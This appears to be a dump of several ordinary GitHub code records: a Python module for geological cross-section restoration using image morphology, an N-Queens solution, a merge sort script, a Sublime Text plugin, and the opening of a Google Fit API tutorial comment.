CombineXY(chips.content,data_curve) \n \n#============================================================================== \n#更新Chip的top\ndef ChipUpdateTop(which_Chip):\n\n# print(which_Chip.total_tag)\n \n #top不可以是fault\n if -1 in which_Chip.total_tag:\n which_Chip.total_tag.remove(-1)\n \n #所有tag的高度\n total_tag_top=[]\n \n #所有tag的fraction\n total_tag_fraction=[]\n \n for this_tag in which_Chip.total_tag:\n \n this_tag_fraction=o.fraction()\n this_tag_content=[]\n \n for this_chips in which_Chip.total_chips:\n\n for this_chip in this_chips.total_chip:\n \n for pos in this_chip.content:\n \n if this_tag==this_chip.tag:\n \n this_tag_content.append(pos)\n \n #I坐标取平均,求最小值 \n I_this_tag=[pos[0] for pos in this_tag_content]\n top_I_this_tag=np.mean(I_this_tag) \n \n this_tag_fraction.content=this_tag_content\n this_tag_fraction.tag=this_tag\n \n #上车上车\n total_tag_top.append(top_I_this_tag)\n total_tag_fraction.append(this_tag_fraction)\n \n #平均I与total_tag的索引\n map_top_total_tag=dict(zip(total_tag_top,which_Chip.total_tag))\n \n #total_tag和content的索引\n map_total_tag_fraction=dict(zip(which_Chip.total_tag,total_tag_fraction)) \n \n #求目标tag值\n target_tag=map_top_total_tag[min(total_tag_top)] \n \n# print(target_tag)\n \n #更新top\n top_content=[]\n \n for this_chips in which_Chip.total_chips:\n \n for this_chip in this_chips.total_chip:\n \n if this_chip.tag==target_tag:\n \n top_content+=this_chip.content\n \n #定义top\n which_Chip.top=o.fraction()\n which_Chip.top.content=top_content\n which_Chip.top.tag=target_tag\n \n #移除top\n del map_total_tag_fraction[map_top_total_tag[min(total_tag_top)]]\n\n #定义pthers\n which_Chip.others=list(map_total_tag_fraction.values())\n \n #检验模块\n# print(which_Chip.top.tag)\n# \n# for this_fraction in which_Chip.others:\n# print(this_fraction.tag)\n \n#9.6\n#============================================================================== \n\"\"\"把开闭运算的结果坐标存在列表里并设置背景色\"\"\"\n#target为前景的灰度值\n#腐蚀运算\n#由像素点计算的情况\ndef ImgErode(img,target):\n \n #逆时针遍历邻域内的点\n #领域核\n neighbordict=[(i,j) for i in [-1,0,1] for j in [-1,0,1]]\n neighbordict.remove((0,0))\n\n #背景tag\n background_tag=img[0,0]\n new_img_tag=np.full(np.shape(img),background_tag)\n \n for i in range(np.shape(img)[0]):\n \n for j in range(np.shape(img)[1]): \n \n #仅作用于前景\n if img[i,j]==target:\n \n neighbor=[] \n \n #[i,j-1],[i+1,j-1],[i+1,j],[i+1,j+1],[i,j+1],[i-1,j+1],[i-1,j],[i-1,j-1]\n for item in neighbordict:\n \n #遍历新的坐标\n new_i=i+item[0]\n new_j=j+item[1]\n \n if 0<=new_i<np.shape(img)[0] and 0<=new_j<np.shape(img)[1]:\n \n neighbor.append(img[new_i,new_j])\n else:\n neighbor.append(None)\n \n #领域值是否都相等 \n if neighbor==[img[i,j]]*len(neighbor):\n \n new_img_tag[i,j]=img[i,j]\n \n #计算结果\n result_content=[]\n \n for i in range(np.shape(new_img_tag)[0]):\n \n for j in range(np.shape(new_img_tag)[1]): \n \n #加入列表当中 \n if new_img_tag[i,j]==target:\n \n result_content.append([i,j])\n \n return new_img_tag,result_content\n \n#由content计算 \ndef ContentErode(content): \n \n #逆时针遍历邻域内的点\n #领域核\n neighbordict=[(i,j) for i in [-1,0,1] for j in [-1,0,1]]\n neighbordict.remove((0,0))\n\n #计算后的结果列表\n new_content=[]\n \n for pos in content:\n \n neighbor=[] \n \n #[i,j-1],[i+1,j-1],[i+1,j],[i+1,j+1],[i,j+1],[i-1,j+1],[i-1,j],[i-1,j-1]\n for item in neighbordict:\n \n #遍历新的坐标\n new_i=pos[0]+item[0]\n new_j=pos[1]+item[1]\n \n #前提是这个点的位置是有效的\n if [new_i,new_j] in content:\n \n neighbor.append(True) \n else:\n neighbor.append(False)\n \n #领域值是否都相等 \n if neighbor==len(neighbor)*[True]:\n \n new_content.append(pos)\n \n return new_content\n \n#img膨胀运算\ndef ImgExpand(img,target):\n \n #逆时针遍历邻域内的点\n #领域核\n neighbordict=[(i,j) for i in [-1,0,1] for j in [-1,0,1]]\n neighbordict.remove((0,0))\n \n #背景tag\n background_tag=img[0,0]\n new_img_tag=np.full(np.shape(img),background_tag)\n \n for i in range(np.shape(img)[0]):\n \n for j in range(np.shape(img)[1]): \n \n #仅作用于前景\n if img[i,j]==target:\n new_img_tag[i,j]=img[i,j]\n \n #[i,j-1],[i+1,j-1],[i+1,j],[i+1,j+1],[i,j+1],[i-1,j+1],[i-1,j],[i-1,j-1]\n for item in neighbordict:\n\n #遍历新的坐标\n new_i=i+item[0]\n new_j=j+item[1]\n \n #重复赋值 \n if 0<=new_i<np.shape(img)[0] and 0<=new_j<np.shape(img)[1]:\n \n new_img_tag[new_i,new_j]=img[i,j]\n \n #计算结果\n result_content=[]\n \n for i in range(np.shape(new_img_tag)[0]):\n \n for j in range(np.shape(new_img_tag)[1]): \n \n #加入列表当中 \n if new_img_tag[i,j]==target:\n \n result_content.append([i,j])\n \n return new_img_tag,result_content\n \n \n#content膨胀运算\ndef ContentExpand(content):\n \n #逆时针遍历邻域内的点\n #领域核\n neighbordict=[(i,j) for i in [-1,0,1] for j in [-1,0,1]]\n neighbordict.remove((0,0))\n \n #膨胀操作后的结果\n new_content=[]\n \n for pos in content:\n \n #[i,j-1],[i+1,j-1],[i+1,j],[i+1,j+1],[i,j+1],[i-1,j+1],[i-1,j],[i-1,j-1]\n for item in neighbordict:\n \n #遍历新的坐标\n new_i=pos[0]+item[0]\n new_j=pos[1]+item[1]\n \n #增加新的点儿\n if [new_i,new_j] not in content:\n \n new_content.append([new_i,new_j])\n \n #增加new_content\n new_content+=content\n \n return new_content\n\n#9.19\n#============================================================================== \n#target_tag为要做处理的tag\n#n为迭代次数\n#由像素矩阵计算 \n#结构闭运算\ndef ImgClose(img_rgb,rgb_dict,background_rgb,target_tag,n,show=False):\n \n #转化为单通道\n new_img_tag=RGB2Tag(img_rgb,rgb_dict)\n \n# print(np.shape(new_img_tag))\n \n #初始化new_content\n new_content=[]\n \n for i in range(np.shape(new_img_tag)[0]):\n \n for j in range(np.shape(new_img_tag)[1]):\n \n if new_img_tag[i,j]==target_tag:\n \n new_content.append([int(i),int(j)])\n \n #必须有执行次数.若n=0,则不执行咯\n if n: \n #先膨胀\n for k in range(n): \n new_img_tag,new_content=ImgExpand(new_img_tag,target_tag)\n \n #后侵蚀\n for k in range(n):\n new_img_tag,new_content=ImgErode(new_img_tag,target_tag) \n \n # print(np.shape(new_img_rgb))\n \n #着色\n new_img_rgb=np.full(np.shape(img_rgb),background_rgb)\n\n for pos in new_content: \n new_img_rgb[pos[0],pos[1]]=rgb_dict[target_tag]\n \n #显示计算结果\n if show:\n plt.figure()\n plt.imshow(new_img_rgb)\n \n return new_img_rgb,new_content\n \n#由列表计算 \ndef ContentClose(content,n,show=False): \n\n #先膨胀\n for k in range(n): \n content=ContentExpand(content)\n\n #后侵蚀\n for k in range(n):\n content=ContentErode(content) \n \n return content\n \n#结构开运算\n#由像素矩阵计算 \ndef ImgOpen(img_rgb,rgb_dict,background_rgb,target_tag,n,show=False):\n \n #转化为单通道\n new_img_tag=RGB2Tag(img_rgb,rgb_dict)\n \n #初始化new_content\n new_content=[]\n \n for i in range(np.shape(new_img_tag)[0]):\n \n for j in range(np.shape(new_img_tag)[1]):\n \n if new_img_tag[i,j]==target_tag:\n \n new_content.append([int(i),int(j)])\n \n #必须有执行次数.若n=0,则不执行咯\n if n:\n #先侵蚀\n for k in range(n):\n new_img_tag,new_content=ImgErode(new_img_tag,target_tag)\n \n #后膨胀\n for k in range(n): \n new_img_tag,new_content=ImgExpand(new_img_tag,target_tag) \n \n #着色\n new_img_rgb=np.full(np.shape(img_rgb),background_rgb)\n \n for pos in new_content: \n new_img_rgb[pos[0],pos[1]]=rgb_dict[target_tag]\n \n #显示计算结果\n if show:\n plt.figure()\n plt.imshow(new_img_rgb)\n \n return new_img_rgb,new_content\n\n#由列表计算 \ndef ContentOpen(content,n,show=False): \n \n #先侵蚀\n for k in range(n):\n content=ContentErode(content)\n \n #后膨胀\n for k in range(n): \n content=ContentExpand(content) \n \n return content\n \n#9.7\n#============================================================================== \n\"\"\"如何变得好看,平滑?闭运算?\"\"\"\n#对Chips集合进行高度校正\n#extent表示闭运算的程度\ndef ChipsRegularization(CHIP_1,CHIP_2,img_rgb,rgb_dict,extent=0,show=False,output=True):\n \n #将Chip分别正则化\n CHIP_1.Regularize()\n CHIP_2.Regularize()\n \n #���正CHIPS的总高度\n# I_top_1=min([pos[0] for pos in CHIP_1.content])\n# I_top_2=min([pos[0] for pos in CHIP_2.content])\n# \n #两偏移距与高度的差之和为恒定值\n# I_offset_1=int(np.round((I_top_2-I_top_1)/2))\n# I_offset_2=int(I_top_1-I_top_2+I_offset_1)\n \n# print(I_top_1,I_top_2)\n# print(I_offset_1,I_offset_2)\n \n# CHIP_1.Move(I_offset_1,0)\n# CHIP_2.Move(I_offset_2,0)\n\n #更新顶层\n CHIP_1.UpdateTop()\n CHIP_2.UpdateTop()\n \n if show:\n \n #显示fraction集合\n img_rgb_top=ShowFractions([CHIP_1.top,CHIP_2.top],img_rgb,rgb_dict,output=True)\n \n# print(np.shape(img_rgb_top))\n \n #闭运算\n ImgClose(img_rgb_top,rgb_dict,img_rgb[0,0],CHIP_1.top.tag,extent,show)\n \n return CHIP_1,CHIP_2\n\n\"\"\"\ncase 1:top消失的函数 ok\ncase 2:将others融入top的函数 ok\ncase 3:自动识别下一个fault的函数 手动勾选\ncase 4:定义类的侵蚀和膨胀函数 ok\n\"\"\"\n\n#============================================================================== \n#在Chip对象当中DeleteTop\n#extent表示Close的次数\ndef DeleteTop(which_Chip,extent=0,show=False):\n \n# print(which_Chip.top.tag)\n \n for this_chips in which_Chip.total_chips:\n \n for this_chip in this_chips.total_chip:\n \n# print('this chip tag is')\n# print(this_chip.tag)\n \n if this_chip.tag==which_Chip.top.tag:\n \n this_chips.total_chip.remove(this_chip)\n \n# print(this_chips.total_chip)\n \n this_chips.Init()\n \n# print(this_chips.total_chip)\n# print(this_chips.content)\n \n #更新一波 \n which_Chip.Init()\n \n# #使用前\n# if show: \n# which_Chip.top.Show(img_rgb,rgb_dict)\n\n #top的内容\n top_content=ContentClose(which_Chip.top.content,extent)\n\n top_fraction=o.fraction()\n top_fraction.content=top_content\n top_fraction.tag=which_Chip.top.tag\n \n which_Chip.top=top_fraction\n \n #fault的内容\n fault_content=ContentClose(which_Chip.fault_content,extent)\n \n fault_fraction=o.fraction()\n fault_fraction.content=fault_content\n fault_fraction.tag=-1\n \n# #使用后\n# if show:\n# which_Chip.top.Show(img_rgb,rgb_dict)\n\n \"\"\"输出新的top和fault,若新的layer不止一层需要修改成新的对象\"\"\"\n \n #先输出top后输出fault,避免覆盖\n return [top_fraction,fault_fraction]\n\n#9.17\n \n#增加底色并修改尺寸\n#i_bottom为画布的底部i坐标,默认为0\ndef AddBase(img_tag,i_bottom):\n \n import copy\n new_img_tag=copy.deepcopy(img_tag)\n \n #每一列,自下而上遍历\n for j in range(np.shape(img_tag)[1]):\n \n for i in range(np.shape(img_tag)[0]-1,i_bottom,-1):\n \n #找到奇怪的点\n if img_tag[i,j]!=0:\n\n #全用base_tag替代\n new_img_tag[i:i_bottom,j]=np.array([-2]*len(img_tag[i:i_bottom,j]))\n \n break\n \n return new_img_tag\n\n#在画布上画上这些fraction的content\n#计算top基底和断层矩阵的函数\n#简单模型:仅有TopBaseFault各一个的情况\ndef TopBaseFault(Chips,img_tag,rgb_dict,extent,i_bottom):\n \n #新的输出矩阵\n new_img_tag=np.zeros(np.shape(img_tag))\n \n for this_Chip in Chips:\n \n #删除Top\n top_fraction,fault_fraction=DeleteTop(this_Chip,extent)\n\n #先画top\n for pos in top_fraction.content:\n \n new_img_tag[int(pos[0]),int(pos[1])]=top_fraction.tag\n \n #再根据top的位置绘制base\n new_img_tag=AddBase(new_img_tag,i_bottom)\n \n #最后绘制fault\n for pos in fault_fraction.content:\n \n new_img_tag[pos[0],pos[1]]=top_fraction.tag\n \n return new_img_tag\n\n#============================================================================== \n#修改tag矩阵的尺寸\n#i_top表示顶部留白,默认为0\n#即删除空白\ndef FitSize(img_tag,i_top=0,show=False):\n \n #遍历:寻找图像的上下左右边界\n \n #上\n for i in range(np.shape(img_tag)[0]): \n \n if list(img_tag[i,:])!=[0]*len(img_tag[i,:]):\n \n top=i\n \n break\n \n #下\n for i in range(np.shape(img_tag)[0]-1,0,-1): \n \n if list(img_tag[i,:])!=[0]*len(img_tag[i,:]):\n \n bottom=i\n \n break \n \n #左\n for j in range(np.shape(img_tag)[1]): \n \n if list(img_tag[:,j])!=[0]*len(img_tag[:,j]):\n \n left=j\n \n break\n \n #左 \n for j in range(np.shape(img_tag)[1]-1,0,-1):\n \n if list(img_tag[:,j])!=[0]*len(img_tag[:,j]):\n\n right=j\n \n break\n \n# print(left,right,top,bottom)\n \n #显示模块\n if show:\n \n plt.figure()\n plt.imshow(img_tag[top-i_top:bottom+1,left:right+1])\n plt.axis('off')\n \n return img_tag[top-i_top:bottom+1,left:right+1]\n\n#计算当下长度\ndef CalculateLength(img_rgb,rgb_dict,show=False):\n\n img_tag=FitSize(RGB2Tag(img_rgb,rgb_dict))\n img_rgb=np.array(Tag2RGB(img_tag,rgb_dict),dtype=np.uint8)\n \n #显示模块\n if show:\n \n plt.figure()\n plt.imshow(img_rgb)\n #plt.axis('off')\n\n return np.shape(img_rgb)[1]\n\n\"\"\"\n1 os.path.exists(path) 判断一个目录是否存在\n2 os.makedirs(path) 多层创建目录\n3 os.mkdir(path) 创建目录\n\"\"\"\n#11.12\n#============================================================================== \n#在某路径下判断并创建文件夹\ndef GenerateFold(path):\n \n #引入模块\n import os\n \n #去除首位空格\n path=path.strip()\n \n #去除尾部\\符号\n path=path.rstrip(\"\\\\\")\n \n #判断路径是否存在(True/False)\n Exist=os.path.exists(path)\n \n #判断结果\n if not Exist:\n \n #如果不存在则创建目录\n #创建目录操作函数\n os.makedirs(path) \n \n#9.26\n#============================================================================== \n#打印计算结果\n#unit:像素点与长度换算单位\n#save_path:保存路径\ndef PrintResult(save_path,unit,length_before,length_now):\n \n #判断并创建文件夹\n GenerateFold(save_path)\n \n #将计算结果写入result.txt文件\n with open(save_path+'\\\\'+\"result.txt\",\"w\") as file:\n \n file.write('原始长度:%5.2fkm'\n %(length_before/unit))\n \n file.write('\\n')\n \n file.write('当下长度:%5.2fkm'\n %(length_now/unit))\n \n if length_before>length_now:\n \n file.write('\\n')\n file.write('缩短量:%5.2fkm'\n %(float(length_before-length_now)/unit))\n \n file.write('\\n')\n file.write('缩短率:%5.2f%%'\n %(float(length_before-length_now)/unit/length_now*100))\n \n if length_before<length_now:\n \n file.write('\\n')\n file.write('拉张量:%5.2fkm'\n %-(float(length_before-length_now)/unit))\n \n file.write('\\n')\n file.write('拉张率:%5.2f%%'\n %-(float(length_before-length_now)/unit/length_now*100))\n \n \n print('')\n \n print('原始长度:%5.2fkm'%(length_before/unit))\n print('当下长度:%5.2fkm'%(length_now/unit))\n \n if length_before>length_now:\n \n print('缩短量:%5.2fkm'\n %(float(length_before-length_now)/unit))\n \n print('缩短率:%5.2f%%'\n %(float(length_before-length_now)/unit/length_now*100))\n \n if length_before<length_now:\n \n print('拉张量:%5.2fkm'\n %-(float(length_before-length_now)/unit))\n \n print('拉张率:%5.2f%%'\n %-(float(length_before-length_now)/unit/length_now*100))\n \n#10.18 \n#============================================================================== \n#根据新的keys排布dict\ndef DictOrderByKeys(which_dict,new_keys):\n \n #先判断keys和dict的keys是否相同\n if list(set(new_keys))!=list(set(which_dict.keys())):\n \n print('ERROR:invalid keys')\n \n return \n \n #正常情况下\n if list(set(new_keys))==list(set(which_dict.keys())):\n \n #建立新的values列表\n new_values=[which_dict[this_key] for this_key in new_keys]\n \n new_dict=dict(zip(new_keys,new_values))\n \n return new_dict\n \n#根据新的values排布dict\ndef DictOrderByValues(which_dict,new_values):\n \n #先判断keys和dict的keys是否相同\n if list(set(new_values))!=list(set(which_dict.values())):\n \n print('ERROR:invalid values')\n \n return\n \n #正常情况下\n if list(set(new_values))==list(set(which_dict.values())):\n \n #建立新的keys列表\n new_keys=[DictKeyOfValue(which_dict,this_value) for this_value in new_values]\n \n new_dict=dict(zip(new_keys,new_values))\n \n return new_dict\n\n#10.17\n#============================================================================== \n#写一个把像素点网上推的函数\n#img_tag位输入的tag矩阵\ndef PushUpImg(img_tag):\n \n #基底tag\n base_tag=GetBaseTag(img_tag)\n \n #空白tag\n blank_tag=0\n \n #建立新的img_tag\n new_img_tag=np.zeros((np.shape(img_tag)[0],np.shape(img_tag)[1]))\n \n for column in range(np.shape(img_tag)[1]):\n \n #所有的tag\n tag_list=list(set(list(img_tag[:,column])))\n \n #tag对应的depth列表\n depth_list=[]\n \n #遍历所有tag及其深度\n for this_tag in tag_list:\n \n that_depth=np.mean(list(np.where(img_tag[:,column]==this_tag)))\n \n depth_list.append(that_depth)\n \n #tag与深度建立索引\n map_tag_depth=dict(zip(tag_list,depth_list))\n\n #深度list,从小到大来排列\n new_depth_list=sorted(depth_list,reverse=False)\n \n# print(map_tag_depth)\n# print(new_depth_list)\n \n# print(list(map_tag_depth.keys()))\n# print(list(map_tag_depth.keys())==tag_list)\n \n #重组dict\n new_map_tag_depth=DictOrderByValues(map_tag_depth,new_depth_list)\n \n# print(new_map_tag_depth)\n \n #得到了新的tag列表\n new_tag_list=list(new_map_tag_depth.keys())\n \n# print(new_tag_list)\n \n #各个tag的数量\n map_tag_frequency=List2FrequencyDict(img_tag[:,column])\n \n# print(map_tag_frequency)\n \n #频率列表\n# frequency_list=list(map_tag_frequency.values())\n \n# print(frequency_list)\n\n \"\"\"把白色换掉??\"\"\"\n if base_tag in new_tag_list and blank_tag in new_tag_list:\n \n# print(map_tag_frequency[base_tag])\n# print(map_tag_frequency[blank_tag])\n \n #把blank贴到base \n map_tag_frequency[base_tag]+=map_tag_frequency[blank_tag]\n \n #把空白抹掉\n map_tag_frequency.pop(blank_tag)\n \n# print(column) \n# print(map_tag_frequency)\n# print(map_tag_frequency.keys())\n \n #新的列\n new_content=[]\n \n #重新排布\n for this_tag in list(map_tag_frequency.keys()):\n \n new_content+=map_tag_frequency[this_tag]*[this_tag]\n \n# print(len(new_content))\n# print(np.shape(new_img_tag)[0])\n# \n# print(len(new_content)==np.shape(new_img_tag)[0])\n \n #数量不符合就不和他玩了\n if len(new_content)!=np.shape(new_img_tag)[0]:\n \n print('ERROR:invalid column')\n \n return \n \n #正常情况下\n if len(new_content)==np.shape(new_img_tag)[0]:\n \n #新的列应当是这样的\n new_img_tag[:,column]=new_content\n \n return new_img_tag \n \n#10.18\n#============================================================================== \n#点击拾取fractions对象并生成plate对象\n#total_fractions表示图像中的所有fraction对象\ndef PickAndGeneratePlate(total_fractions,img_rgb):\n\n print('')\n print('here comes a new plate')\n \n #建立fractions的content\n Content=[]\n \n #建立pos总集合\n for this_fraction in total_fractions:\n \n Content+=this_fraction.content\n \n #这个plate中所有的fractions\n that_fractions=[]\n \n count=0\n \n import copy\n \n #像素矩阵\n img_rgb_temp=copy.deepcopy(img_rgb)\n \n #循环呗\n while True:\n \n print('......')\n print('please pick the layer')\n \n #点击获取像素点坐标\n layer_point_pos=plt.ginput(1)[0]\n \n #注意反过来,因为是xy坐标\n pos_xy=[int(layer_point_pos[0]),int(layer_point_pos[1])]\n \n pos_IJ=copy.deepcopy(pos_xy)\n \n #IJ形式是xy形式的颠倒\n pos_IJ.reverse()\n \n # print('......')\n # print(pos_IJ)\n \n #如果点到外面,此plate的fraction提取结束\n if pos_IJ not in Content:\n \n print('......')\n print('layer picking of this plate is over')\n \n break\n \n #判断这个坐标合理与否\n for this_fraction in total_fractions:\n \n #判断他在哪\n if pos_IJ in this_fraction.content:\n \n #且不在已收录的fraction对象集中\n if this_fraction in that_fractions: \n \n print('......')\n print('this layer is already picked')\n \n break\n \n if this_fraction not in that_fractions:\n \n count+=1\n \n print('......')\n print('picking the layer'+''+str(count))\n \n ShowEdge(this_fraction,img_rgb_temp)\n \n that_fractions.append(this_fraction)\n \n break\n \n #显示一下呗\n plt.figure()\n plt.imshow(img_rgb_temp)\n\n #生成的plate对象\n that_plate=o.plate()\n \n #初始化\n that_plate.Init(that_fractions)\n \n return that_plate\n\n#============================================================================== \n#表示chips和中点坐标对应关系的键值对\n#axis:'both','I','J'分别表示行列索引,行索引,列索引\ndef MapCenterchipsOf(which_Chip,axis):\n\n map_J_total_chips={}\n \n for this_chips in which_Chip.total_chips:\n \n if this_chips.center!=None:\n \n #以下两句意思一样的\n# map_J_total_chips.update({this_chips:this_chips.center[1]})\n# map_J_total_chips[this_chips]=this_chips.center[1] \n \n #行索引\n if axis is 'I':\n \n map_J_total_chips[this_chips]=this_chips.center[0] \n \n #列索引\n if axis is 'J':\n \n map_J_total_chips[this_chips]=this_chips.center[1] \n \n #列索引\n if axis is 'both':\n \n map_J_total_chips[this_chips]=this_chips.center\n \n# print(map_J_total_chips)\n \n return map_J_total_chips\n\n#返回两端的chips\n#side表示边,有'left'和'right'两个选项\ndef chipsOf(which_Chip,side):\n \n #先建立键值对\n #根据values的值返回chips对象\n map_J_total_chips=MapCenterchipsOf(which_Chip,'J')\n \n #最左的即J最小的chips\n if side is 'left':\n \n return DictKeyOfValue(map_J_total_chips,min(list(map_J_total_chips.values())))\n\n #最右的即J最大的chips\n if side is 'right':\n \n return DictKeyOfValue(map_J_total_chips,max(list(map_J_total_chips.values())))\n\n#which_chips中行索引最小的所有pos集合\ndef TopIPosIn(which_chips):\n \n #求最高点的所有坐标\n I_which_chips=[pos[0] for pos in which_chips.content]\n \n# print(I_which_chips)\n \n top_I_which_chips=min(I_which_chips)\n \n# print(top_I_which_chips)\n# print(which_chips.content)\n \n #返回这一行中所有满足top的点\n top_I_pos_in_which_chips=[pos for pos in which_chips.content if pos[0]==top_I_which_chips]\n \n# print(top_I_pos_in_which_chips)\n\n return top_I_pos_in_which_chips\n\n#返回左右chips的距离最近的两个点 \n#side表示左右chips\ndef SpecialPointOf(which_chips,side):\n \n #先求which_chips中行索引最小的所有pos集合\n top_I_pos_in_which_chips=TopIPosIn(which_chips)\n \n# print(top_I_pos_in_which_chips)\n \n #求他们的行列索引集合\n I_top_I_pos_in_which_chips=[pos[0] for pos in top_I_pos_in_which_chips]\n J_top_I_pos_in_which_chips=[pos[1] for pos in top_I_pos_in_which_chips]\n \n# print(I_top_I_pos_in_which_chips)\n# print(J_top_I_pos_in_which_chips)\n \n #建立索引呗\n map_JI_top_I_pos_in_which_chips=dict(zip(J_top_I_pos_in_which_chips,I_top_I_pos_in_which_chips))\n \n# print(map_JI_top_I_pos_in_which_chips)\n \n #max在右\n if side is 'right':\n \n special_point=[map_JI_top_I_pos_in_which_chips[max(J_top_I_pos_in_which_chips)],max(J_top_I_pos_in_which_chips)]\n \n #min在左\n if side is 'left':\n \n special_point=[map_JI_top_I_pos_in_which_chips[min(J_top_I_pos_in_which_chips)],min(J_top_I_pos_in_which_chips)]\n \n# print(special_point)\n \n return special_point\n \n#将Chips对象聚合在一起\n#先处理两个Chip对象\ndef Cohere(Chips):\n \n #根据中点来判断\n J_center_Chips=[this_Chip.center[1] for this_Chip in Chips]\n \n #建立Chip和J值的索引关系\n map_J_center_Chips=dict(zip(Chips,J_center_Chips))\n\n #min在左\n Chip_left=DictKeyOfValue(map_J_center_Chips,min(list(map_J_center_Chips.values())))\n \n #max在右\n Chip_right=DictKeyOfValue(map_J_center_Chips,max(list(map_J_center_Chips.values())))\n \n# print(Chip_left.center)\n# print(Chip_right.center)\n \n #取Chip_left中最右的\n chips_left=chipsOf(Chip_left,'right')\n \n #取Chip_right中最左的\n chips_right=chipsOf(Chip_right,'left')\n\n# print(chips_right,chips_left)\n \n #根据其坐标进行移动\n# print(chips_right.center)\n# print(chips_left.center)\n# \n# print(chips_right.content)\n# print(chips_left.content)\n\n I_offset=SpecialPointOf(chips_right,'left')[0]-SpecialPointOf(chips_left,'right')[0]\n J_offset=SpecialPointOf(chips_right,'left')[1]-SpecialPointOf(chips_left,'right')[1]\n \n# print(I_offset,J_offset)\n \n #左右盘的位移\n I_offset_left=int(np.floor(I_offset/2))\n J_offset_left=int(np.floor(J_offset/2))\n \n #右边的偏移距 \n I_offset_right=abs(abs(abs(I_offset)-abs(I_offset_left))) \n J_offset_right=abs(abs(abs(J_offset)-abs(J_offset_left)))\n \n #判断是否为0 \n #乘上算子\n if I_offset_left!=0:\n \n I_offset_right*=(-I_offset_left/abs(I_offset_left))\n \n if J_offset_left!=0:\n \n J_offset_right*=(-J_offset_left/abs(J_offset_left))\n \n# print(I_offset_left,J_offset_left)\n# print(I_offset_right,J_offset_right)\n \n# print(Chip_left.center)\n# print(Chip_right.center)\n\n #移动Chip_left,Chip_right\n Chip_left.Move(I_offset_left,J_offset_left)\n Chip_right.Move(I_offset_right,J_offset_right)\n\n# print(Chip_left.center)\n# print(Chip_right.center)\n \n return [Chip_left,Chip_right]\n","repo_name":"jerryweihuajing/Balanced-Cross-Section","sub_path":"other/fault_motion/module_fault_motion.py","file_name":"module_fault_motion.py","file_ext":"py","file_size_in_byte":143689,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"33184891701","text":"class Solution:\n def solveNQueens(self, n: int) -> List[List[str]]:\n res = []\n def dfs(path):\n nonlocal res\n if len(path) == n:\n res.append(path)\n return \n for j in range(n):\n if path and any(c==j or len(path)-j==r-c or len(path)+j==r+c for r, c in enumerate(path)):\n continue\n dfs(path+[j])\n return \n\n def func(path):\n board = []\n for j in path:\n board.append('.'*j+'Q'+'.'*(n-j-1))\n return board\n\n dfs([])\n \n return list(map(func,res))","repo_name":"zhenfelix/OnlineJudgeCodings","sub_path":"LeetCode/面试题/面试题 08.12. 八皇后.py","file_name":"面试题 08.12. 八皇后.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"38666495689","text":"import math\n\nsortThis = [2,3,2,1,0]\nprint('this is supposed to merge sort this: \\n')\nprint(sortThis)\n\ndef mergeSort(array):\n\tif len(array) > 1:\n\t\tif len(array) > 1:\n\t\t\tmid = len(array)//2\n\t\t\tleft = array[:mid]\n\t\t\tright = array[mid:]\n\n\t\t\tmergeSort(left)\n\t\t\tmergeSort(right)\n\n\t\t\ta = 0\n\t\t\tb = 0\n\t\t\tc = 0\n\t\t\tlenLeft = len(left)\n\t\t\tlenRight = len(right)\n\n\t\t\twhile a < lenLeft and b < lenRight:\n\t\t\t\tif left[a] < right[b]:\n\t\t\t\t\tarray[c] = left[a]\n\t\t\t\t\ta = a + 1\n\t\t\t\telse:\n\t\t\t\t\tarray[c]=right[b]\n\t\t\t\t\tb = b + 1\n\t\t\t\tc = c + 1\n\t\t\twhile a < lenLeft :\n\t\t\t\tarray[c] = left[a]\n\t\t\t\ta = a + 1\n\t\t\t\tc = c + 1\n\t\t\twhile b < lenRight:\n\t\t\t\tarray[c] = right[b]\n\t\t\t\tb = b + 1\n\t\t\t\tc = c + 1\n\nmergeSort(sortThis)\nprint(\"I sorted this: \", sortThis) \n","repo_name":"gewenyu99/yeet-code","sub_path":"snakes/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"11774213343","text":"import sublime_plugin\n\n\nclass SublimeSurroundCommand(sublime_plugin.TextCommand):\n\n def on_done(self, word):\n\n for region in self.view.sel():\n\n if not region.empty():\n\n # Get the selected text\n s = self.view.substr(region)\n\n # Surround word by input word\n surroundStr = word + s + word\n\n # Begin new edit session for `undo` to work correctly\n edit = self.view.begin_edit();\n\n # Replace the selection with transformed text\n self.view.replace(edit, region, surroundStr)\n\n # We need to end the session explicitely\n self.view.end_edit(edit);\n\n def run(self, edit):\n\n self.edit = edit\n\n # Show input panel for surround word, then handling input\n self.view.window().show_input_panel('Surrond Word: ', '',\n self.on_done, None, None)\n","repo_name":"shinobukawano/sublime_surround","sub_path":"sublime_surround.py","file_name":"sublime_surround.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"96"} +{"seq_id":"34470870409","text":"'''\r\n1. set-up: https://developers.google.com/fit/rest/v1/get-started\r\n 1.1 set-up Credential -> stay in Testing don't press Publish (you can invite up to 100 collaborators in this state as well)\r\n 1.2 set-up OAuth 2.0 client ID\r\n2. Get Access-token from OAuth Playground when exchanging authorization code for tokens seen in 3.1 fitness api - access code.png \r\n3. set-up requests = same as in 1. fitbit.py\r\n 3.1 what can we get from this API: https://developers.google.com/fit/rest/v1/reference\r\n 3.1.0 userID = me <--- always!\r\n 3.1.1 -> let's see what dataSources there are. Replace down in the code the url with this url:\r\n url = \"https://www.googleapis.com/fitness/v1/users/me/dataSources\"\r\n\r\n -> to be able to GET data from these sources we will need to add the \"dataStreamID\" NOT the \"name\" at the end of our urls (see later)\r\n -> it is quite confusing, because in the documentation they only list the names, not the dataStreamIDs (https://developers.google.com/fit/datatypes/activity)\r\n -> also we would need to use MERGE datasource (these IDs start with \"derived\", not \"raw\" -> this is important as thanks to Google Health Connect\r\n the Fitness API is pulling data from all of our connected apps on our phone. So we want to list the aggregated data not just from 1 source\r\n \r\n -> BUT FIRST LET'S GET THE DATASOURCE SAVED IN AN EXCEL -> Use ChatGPT\r\n write: this is my json response I get, only print the dataStreamIDs, {insert the whole json object response that you get when you called the url}\r\n write: also get back beside the dataStreamIDs the corresponding name that is given back in the dataType\r\n write: let's save it to an excel where name is column A and id is 